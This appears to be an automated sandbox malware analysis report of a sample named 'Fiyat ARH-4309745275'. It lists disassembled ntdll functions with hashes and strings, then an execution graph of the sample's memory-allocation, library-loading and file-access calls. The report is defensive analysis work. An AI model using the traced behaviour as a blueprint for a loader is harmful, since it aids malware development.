                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 948964698323b40564b3599ce0bbf63bf7efeb1d986514deebad014f3e110b4f
                  • Instruction ID: 953915b615ceb8ea89671596340dc8be1d40346638eab9cb0642f3fd0d60dd25
                  • Opcode Fuzzy Hash: 948964698323b40564b3599ce0bbf63bf7efeb1d986514deebad014f3e110b4f
                  • Instruction Fuzzy Hash: 5B90022260141502D10571584405616004A97D1241F95C162E1064556ECF258A96A231
                  Function 01B12EE0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 93812a656e1b8e45c8c34ccdff0cb86cca9a71c867af4b9ff1aeddcda1cc53b9
                  • Instruction ID: bc06ea1492e7847c6897a18aea293e755dd6001380a5a1b6bede5b4396d5722b
                  • Opcode Fuzzy Hash: 93812a656e1b8e45c8c34ccdff0cb86cca9a71c867af4b9ff1aeddcda1cc53b9
                  • Instruction Fuzzy Hash: 6D90026220181403D14475584805607004597D1302F55C151E20A4556ECF298D556235
                  Function 01B12E30 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 40767c2d60f684d761ff2687ceae309b5c8d352281b473c2efd771f268715200
                  • Instruction ID: ac0a4e64ef771533302ebecd9e64b7a68ba7605057ea3d7af29ca529fdd3aa67
                  • Opcode Fuzzy Hash: 40767c2d60f684d761ff2687ceae309b5c8d352281b473c2efd771f268715200
                  • Instruction Fuzzy Hash: F990022230141402D106715844156060049D7D2345F95C152E1464556DCB258A57A232
                  Function 01B13090 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 787ef56b7964a61aacd2b8310e7911d8f04c6d29425584e6e824120e325c5663
                  • Instruction ID: 40be051f98fdf5d2ce154c291e89229c3940a5eef3aaa8e8008b6ba878ceee6c
                  • Opcode Fuzzy Hash: 787ef56b7964a61aacd2b8310e7911d8f04c6d29425584e6e824120e325c5663
                  • Instruction Fuzzy Hash: 0890022224141802D144715884157070046D7D1601F55C151E0064555DCB168A6967B1
                  Function 01B13010 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7eb12cc84699abcf5571b62eb5d0ac82d8f0a0ed9c09d86346165675c6e497d0
                  • Instruction ID: 53fa4dc173361f163380f512eaf0a62117caadceb6b610a63a2387cfe3ba767e
                  • Opcode Fuzzy Hash: 7eb12cc84699abcf5571b62eb5d0ac82d8f0a0ed9c09d86346165675c6e497d0
                  • Instruction Fuzzy Hash: 4590022220185442D14472584805B0F414597E2202F95C159E4196555CCE1589595721
                  Function 01B139B0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 84ac804310655d32d2dfb59d8f8937e85705de9150a895b82e889d4c739ab94b
                  • Instruction ID: 9f20bfee76d80952e45aeb7d63a484f09013f873aa369831e18d06bddf64dddc
                  • Opcode Fuzzy Hash: 84ac804310655d32d2dfb59d8f8937e85705de9150a895b82e889d4c739ab94b
                  • Instruction Fuzzy Hash: C790022224546102D154715C44056164045B7E1201F55C161E0854595DCA5589596321
                  Function 01B13D10 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fca3b592ad1b61526de75374f8d5066002162ec2ed46c2fce3d4100b5d97bef3
                  • Instruction ID: af5980594522fde57147dc547c0b69c85be59da112f302a1984b0576eed133a8
                  • Opcode Fuzzy Hash: fca3b592ad1b61526de75374f8d5066002162ec2ed46c2fce3d4100b5d97bef3
                  • Instruction Fuzzy Hash: 2A90023220241142954472585805A4E414597E2302B95D555E0055555CCE1489655321
                  Function 01B13D70 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 08370dee7884534b9e480e23c6a56f0cddcc2e49562d559e0e53118b1aa81dc4
                  • Instruction ID: 8d05681cf0ef77211e0633a21fafcd40a846ae0b97cf7bb63eac8bf624a38588
                  • Opcode Fuzzy Hash: 08370dee7884534b9e480e23c6a56f0cddcc2e49562d559e0e53118b1aa81dc4
                  • Instruction Fuzzy Hash: AC90023620141402D51471585805646008697D1301F55D551E0464559DCB5489A5A221
                  Function 01B12C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                  • Instruction ID: 1f8b57502cdf68d49a2e0cc99e9da9b0650b1410df2ab359c606d3bf79db26da
                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                  • Instruction Fuzzy Hash:
                  Function 01B12890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 79f1241fd22797a6b1f31f49d1e139128f38e18417c891784ec0d8d5d27f7e50
                  • Instruction ID: f760eb4bd8ee5fdef9db88287ed3828d86e4410bd0f1086f484359343f4a1113
                  • Opcode Fuzzy Hash: 79f1241fd22797a6b1f31f49d1e139128f38e18417c891784ec0d8d5d27f7e50
                  • Instruction Fuzzy Hash: BA51C4A5A00116BFDF19DBAC899097EFBB8FF082407A1C2E9E469D7645D334DE0087E0
                  Function 01B82410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 3479639df6933308d1fcfba6a257de70e023eff3351b1848957cda032e554b3e
                  • Instruction ID: 00ae980661724e5579fd6c1178be3040100be2dfbe711acde2ef339c6c0dcf85
                  • Opcode Fuzzy Hash: 3479639df6933308d1fcfba6a257de70e023eff3351b1848957cda032e554b3e
                  • Instruction Fuzzy Hash: A451F3B5A40646AEDF28EE9CC8909BFBBF8EF44A00B4484D9E596D7641E774DA00C770
                  Function 01B07630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                  Download Yara Rule
                  Strings
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B44742
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B446FC
                  • Execute=1, xrefs: 01B44713
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B44655
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B44725
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01B44787
                  • ExecuteOptions, xrefs: 01B446A0
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 0-484625025
                  • Opcode ID: a0f842f7183c34e1835a4d15f8b0a65b7ae645419bab4181d09be49e6eeaaa1f
                  • Instruction ID: 61135b6e33a3b9831c4457ef8000ac4b60a8a845187ff5d9ffa1ba5d50803332
                  • Opcode Fuzzy Hash: a0f842f7183c34e1835a4d15f8b0a65b7ae645419bab4181d09be49e6eeaaa1f
                  • Instruction Fuzzy Hash: 5A513B316002097BEF1AEBA8DC99FB9BBA8EF14340F1401D9E605A71C1DF71AA45CF50
                  Function 01BA6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                  • Instruction ID: fbc87468a8e4cabb422a7923aef3b6322503c0a41c220fd29f1cdd92e1c5f726
                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                  • Instruction Fuzzy Hash: AF0218B1508341AFD709CF19C490A6FBBE5EFC8700F9489ADFA858B254DB71E905CB92
                  Function 01B1B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-$0$0
                  • API String ID: 1302938615-699404926
                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                  • Instruction ID: 2979a4fb6c34805813220b5a1dfba0ee1e24043f8d987c9894cc540b75c1f450
                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                  • Instruction Fuzzy Hash: 8D81E470E012498EEF2D8F6CC6507FEBBB1EF55720F9A46D9E861A7299C7308840C761
                  Function 01B820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$[$]:%u
                  • API String ID: 48624451-2819853543
                  • Opcode ID: 1bd3fde08e8b8ecb3b1606bc7b5406e746496e8f229f7b93c5a00365090201ea
                  • Instruction ID: 1d194c5ee4fb0d4dae04082de66dddf2936fd97c0125929bf00b971a41ad10c1
                  • Opcode Fuzzy Hash: 1bd3fde08e8b8ecb3b1606bc7b5406e746496e8f229f7b93c5a00365090201ea
                  • Instruction Fuzzy Hash: BE21657AA00119ABDB14FF7ACC41AEE7BF8EF58A40F54019AE905E3204E730D915CBA1
                  Function 01AFF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                  Download Yara Rule
                  Strings
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B402E7
                  • RTL: Re-Waiting, xrefs: 01B4031E
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B402BD
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                  • API String ID: 0-2474120054
                  • Opcode ID: bf43aceaf450da01de32de73d8f50a4063d4473b7d1e2d9f493d7b60859fb9f9
                  • Instruction ID: c1d4c0d06ba9093b68e908f6b9bd903323ae74e442151b3a8819526c4f1318aa
                  • Opcode Fuzzy Hash: bf43aceaf450da01de32de73d8f50a4063d4473b7d1e2d9f493d7b60859fb9f9
                  • Instruction Fuzzy Hash: B7E1AE326047419FDB29DF68C884B6ABBE0FB88714F144A9DF6A5CB2E1D774D844CB42
                  Function 01B0BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                  Download Yara Rule
                  Strings
                  • RTL: Resource at %p, xrefs: 01B47B8E
                  • RTL: Re-Waiting, xrefs: 01B47BAC
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B47B7F
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 0-871070163
                  • Opcode ID: 598d5c2168e89f3d5a365eb713854baf8474095b7fefc76a6c516669c170344d
                  • Instruction ID: f367057da14344c3a25b710b1cb7eb13ee027e9f1b47e55eda648ec8cea353e5
                  • Opcode Fuzzy Hash: 598d5c2168e89f3d5a365eb713854baf8474095b7fefc76a6c516669c170344d
                  • Instruction Fuzzy Hash: 0141F6353007029FDB2ADE29C950B66BBE5FF94710F100A9DF956D7680DB31E805CB91
                  Function 01B0B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                  Download Yara Rule
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B4728C
                  Strings
                  • RTL: Resource at %p, xrefs: 01B472A3
                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B47294
                  • RTL: Re-Waiting, xrefs: 01B472C1
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-605551621
                  • Opcode ID: 494dd816899f623c4812babd9996a025dd9831fa5c8369a97e6d44ee1f05ec2d
                  • Instruction ID: b289c5b8339dd251be429be526855d4ff53bd398e441a65a1063f357f2ff1583
                  • Opcode Fuzzy Hash: 494dd816899f623c4812babd9996a025dd9831fa5c8369a97e6d44ee1f05ec2d
                  • Instruction Fuzzy Hash: 66413035700202ABCB29CE29CD41F6ABBA5FB95710F104698F955EB280DB31E842CBD1
                  Function 01B82300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: 2d38c8dc31ecbd571e9c76ba9f0e663b94685d9e5943ed3b6204b8f46a7a1a03
                  • Instruction ID: 0659c63de50cd2831123c2b37d00dc278d8531d00d235a63b80619d345deebd3
                  • Opcode Fuzzy Hash: 2d38c8dc31ecbd571e9c76ba9f0e663b94685d9e5943ed3b6204b8f46a7a1a03
                  • Instruction Fuzzy Hash: 9A3168766002199FDB24DE2DCD90BEEB7F8FF54A50F8445D9E949E3140EB309A44CB60
                  Function 01B17D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-
                  • API String ID: 1302938615-2137968064
                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                  • Instruction ID: a197c4e029adeff6941bbdfd6b7cfe7289fe17aac877616152593b3324e78c1b
                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                  • Instruction Fuzzy Hash: FC919771E0024A9ADF2CDF5DC8806BF7BA5FF44320FA6469AE955E72C8DF3099408751
                  Function 01AD9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: $$@
                  • API String ID: 0-1194432280
                  • Opcode ID: baf41797a8c1f533dc247f79390e97dbb9726bb3fc0e6c1e4a1e4a3991f57faa
                  • Instruction ID: 29d4d97473717692b59c3b9c9b7a4a30d3a873163a2cb10907a8e5d53dda5adc
                  • Opcode Fuzzy Hash: baf41797a8c1f533dc247f79390e97dbb9726bb3fc0e6c1e4a1e4a3991f57faa
                  • Instruction Fuzzy Hash: 2E811B71D006699BDB35DF54CD45BEABBB4AF48714F0041DAEA1AB7280D7709E84CFA0
                  Function 01B5CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                  Download Yara Rule
                  APIs
                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 01B5CFBD
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: CallFilterFunc@8
                  • String ID: @$@4_w@4_w
                  • API String ID: 4062629308-713214301
                  • Opcode ID: 62747e2548aa60c04f0b652f78e245f8122a1273c6bbda3644a20d6cf0730f00
                  • Instruction ID: e0230195d2bbc4399aac883ac41977c6e7dc2d315132ff899427bae441490185
                  • Opcode Fuzzy Hash: 62747e2548aa60c04f0b652f78e245f8122a1273c6bbda3644a20d6cf0730f00
                  • Instruction Fuzzy Hash: F441BC71900215DFCB29AFA9C990BAEBBF8FF58B50F0441AAED05DB264D774C805CB61

                  Execution Graph

                  Execution Coverage:2.6%
                  Dynamic/Decrypted Code Coverage:4.3%
                  Signature Coverage:2.3%
                  Total number of Nodes:442
                  Total number of Limit Nodes:71
                  execution_graph 95490 bd303c 95495 bd7750 95490->95495 95493 bd3061 95496 bd304c 95495->95496 95497 bd776a 95495->95497 95496->95493 95501 be7fe0 95496->95501 95504 be76f0 95497->95504 95500 be7fe0 NtClose 95500->95496 95502 be7ffd 95501->95502 95503 be800e NtClose 95502->95503 95503->95493 95505 be770a 95504->95505 95508 4d435c0 LdrInitializeThunk 95505->95508 95506 bd783a 95506->95500 95508->95506 95509 4d42ad0 LdrInitializeThunk 95510 bd26ba 95511 bd26e8 95510->95511 95514 bd5f30 95511->95514 95513 bd26f3 95515 bd5f63 95514->95515 95516 bd5f87 95515->95516 95521 be7b60 95515->95521 95516->95513 95518 bd5faa 95518->95516 95519 be7fe0 NtClose 95518->95519 95520 bd602a 95519->95520 95520->95513 95522 be7b7a 95521->95522 95525 4d42ca0 LdrInitializeThunk 95522->95525 95523 be7ba6 95523->95518 95525->95523 95526 bcb430 95529 be9e40 95526->95529 95528 bccaa1 95532 be8140 95529->95532 95531 be9e71 95531->95528 95533 be81ca 95532->95533 95535 be8164 95532->95535 95534 be81e0 NtAllocateVirtualMemory 95533->95534 95534->95531 95535->95531 95536 bc97b0 95539 bc9c2e 95536->95539 95537 bca235 95539->95537 95540 be9b60 95539->95540 95541 be9b86 95540->95541 95546 bc40f0 95541->95546 95543 be9b92 95544 be9bc0 95543->95544 95549 be45f0 95543->95549 95544->95537 95553 bd3140 95546->95553 95548 bc40fd 95548->95543 95550 be464a 95549->95550 95552 be4657 95550->95552 95577 bd1600 95550->95577 95552->95544 95554 bd3157 95553->95554 95556 bd3170 95554->95556 95557 be8a40 95554->95557 95556->95548 95559 be8a58 95557->95559 95558 be8a7c 95558->95556 95559->95558 95564 be7650 95559->95564 95565 be766d 95564->95565 95571 4d42c0a 95565->95571 95566 be7699 95568 be9ed0 95566->95568 95574 be8340 95568->95574 95570 be8aea 95570->95556 95572 4d42c11 95571->95572 95573 4d42c1f LdrInitializeThunk 95571->95573 95572->95566 95573->95566 95575 be835d 95574->95575 95576 be836e RtlFreeHeap 95575->95576 95576->95570 95578 bd163b 95577->95578 95593 bd7860 95578->95593 95580 bd1643 95591 bd1903 95580->95591 95604 be9fb0 95580->95604 95582 bd1659 95583 be9fb0 RtlAllocateHeap 95582->95583 95584 bd1667 95583->95584 95585 be9fb0 RtlAllocateHeap 95584->95585 95586 bd1678 95585->95586 95592 bd1708 95586->95592 95615 bd6690 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95586->95615 95589 bd18c3 95611 be6d10 95589->95611 95591->95552 95607 bd4410 95592->95607 95594 bd788c 95593->95594 95595 bd7750 2 API calls 95594->95595 95596 bd78af 95595->95596 95597 bd78d1 95596->95597 95599 bd78b9 95596->95599 95598 bd78ed 95597->95598 95602 be7fe0 NtClose 95597->95602 95598->95580 95600 bd78c4 95599->95600 95601 be7fe0 NtClose 95599->95601 95600->95580 95601->95600 95603 bd78e3 95602->95603 95603->95580 95616 be82f0 95604->95616 95606 be9fcb 95606->95582 95608 bd4434 95607->95608 95609 bd443b 95608->95609 95610 bd447e LdrLoadDll 95608->95610 95609->95589 95610->95609 95613 be6d6a 95611->95613 95612 be6d77 95612->95591 95613->95612 95619 bd1920 95613->95619 95615->95592 95617 be830d 95616->95617 95618 be831e RtlAllocateHeap 95617->95618 95618->95606 95637 bd7b30 95619->95637 95621 bd1940 95622 bd1e28 95621->95622 95641 be0780 95621->95641 95622->95612 95625 bd1b25 95648 beafb0 95625->95648 95627 bd1b41 95653 beb0e0 95627->95653 95629 bd199e 95629->95622 95644 be6c80 95629->95644 95631 bd1b56 95632 bd1b81 95631->95632 95659 bd05c0 95631->95659 95632->95622 95635 bd05c0 LdrInitializeThunk 95632->95635 95662 bd7ad0 95632->95662 95634 bd1caf 95634->95632 95636 bd7ad0 LdrInitializeThunk 95634->95636 95635->95632 95636->95634 95638 bd7b3d 95637->95638 95639 bd7b5e SetErrorMode 95638->95639 95640 bd7b65 95638->95640 95639->95640 95640->95621 95642 be9e40 NtAllocateVirtualMemory 95641->95642 95643 be07a1 95642->95643 95643->95629 95645 be6cda 95644->95645 95647 be6cef 95645->95647 95666 bd1e40 95645->95666 95647->95625 95649 beafc6 95648->95649 95650 beafc0 95648->95650 95651 be9fb0 RtlAllocateHeap 95649->95651 95650->95627 95652 beafec 95651->95652 95652->95627 95655 beb050 95653->95655 95654 beb0ad 95654->95631 95655->95654 95656 be9fb0 RtlAllocateHeap 95655->95656 95657 beb08a 95656->95657 95658 be9ed0 RtlFreeHeap 95657->95658 95658->95654 95672 be8260 95659->95672 95663 bd7ae3 95662->95663 95677 be7560 95663->95677 95665 bd7b0e 95665->95632 95667 bd1e52 95666->95667 95670 bd1d32 95666->95670 95667->95647 95668 bd05c0 LdrInitializeThunk 95668->95670 95669 bd7ad0 LdrInitializeThunk 95669->95670 95670->95668 95670->95669 95671 bd1e28 95670->95671 95671->95647 95673 be827a 95672->95673 95676 4d42c70 LdrInitializeThunk 95673->95676 95674 bd05e2 95674->95634 95676->95674 95678 be75d3 95677->95678 95679 be7584 95677->95679 95682 4d42dd0 LdrInitializeThunk 95678->95682 95679->95665 95680 be75f8 95680->95665 95682->95680 95779 bda670 95784 bda3a0 95779->95784 95781 bda67d 95798 bda040 95781->95798 95783 bda693 95785 bda3c5 95784->95785 95809 bd7d20 95785->95809 95788 bda502 95788->95781 95790 bda519 95790->95781 95791 bda510 95791->95790 95793 bda601 95791->95793 95824 bd9aa0 95791->95824 95794 bda659 95793->95794 95833 bd9e00 95793->95833 95796 be9ed0 RtlFreeHeap 95794->95796 95797 bda660 95796->95797 95797->95781 95799 bda056 95798->95799 95806 bda061 95798->95806 95800 be9fb0 RtlAllocateHeap 95799->95800 95800->95806 95801 bda077 95801->95783 95802 bd7d20 GetFileAttributesW 95802->95806 95803 bda36e 95804 bda387 95803->95804 95805 be9ed0 RtlFreeHeap 95803->95805 95804->95783 95805->95804 95806->95801 95806->95802 95806->95803 95807 bd9aa0 RtlFreeHeap 95806->95807 95808 bd9e00 RtlFreeHeap 95806->95808 95807->95806 95808->95806 95810 bd7d41 95809->95810 95811 bd7d53 95810->95811 95812 bd7d48 GetFileAttributesW 95810->95812 95811->95788 95813 be2420 95811->95813 95812->95811 95814 be242e 95813->95814 95815 be2435 95813->95815 95814->95791 95816 bd4410 LdrLoadDll 95815->95816 95817 be246a 95816->95817 95818 be2479 95817->95818 95837 be1ef0 LdrLoadDll 95817->95837 95820 be9fb0 RtlAllocateHeap 95818->95820 95823 be2614 95818->95823 95822 be2492 95820->95822 95821 be9ed0 RtlFreeHeap 95821->95823 95822->95821 95822->95823 95823->95791 95825 bd9ac6 95824->95825 95838 bdd2d0 95825->95838 95827 bd9b2d 95829 bd9cb0 95827->95829 95830 bd9b4b 95827->95830 95828 bd9c95 95828->95791 95829->95828 95831 bd9960 RtlFreeHeap 95829->95831 95830->95828 95843 bd9960 95830->95843 95831->95829 95834 bd9e26 95833->95834 95835 bdd2d0 RtlFreeHeap 95834->95835 95836 bd9ea2 